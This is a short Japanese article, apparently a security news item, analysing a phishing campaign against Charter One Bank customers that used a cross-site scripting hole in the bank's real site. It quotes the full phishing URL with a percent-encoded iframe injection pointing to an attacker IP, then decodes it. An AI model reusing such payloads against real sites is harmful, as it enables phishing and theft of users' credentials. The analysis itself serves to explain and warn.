PR

 今年5月に出回ったCharter One Bankのフィッシングは、クロスサイトスクリプティングの脆弱性を悪用したものだった。

 「Account Error」と題されたメールには次のようなリンクがある。www.charterone.comはCharter One Bankの本物のサイト。

http://www.charterone.com/cards/market.asp?code=%22%3E%3Ciframe+
style%3D%22top%3A0%3B+left%3A0%3B+position%3Aabsolute%3B%22+
FRAMEBORDER%3D%220%22+BORDER%3D%220%22+width%3D1000+height%3D600+
src%3D%22http%3A%2F%2F62.193.220.52/charter%2F%22%3E

 パーセントエンコーディングされている部分をデコーディングすると、

"><iframe style="top:0; left:0; position:absolute;" FRAMEBORDER="0" BORDER="0" width=1000 height=600 src="http://62.193.220.52/charter/">
となり、market.aspにパラメータとしてIFRAME要素を渡していることがわかる。market.aspは、これを適切に処理せず、利用者のブラウザにそのまま渡してしまう。その結果、src属性に設定された偽サイトのコンテンツが表示される。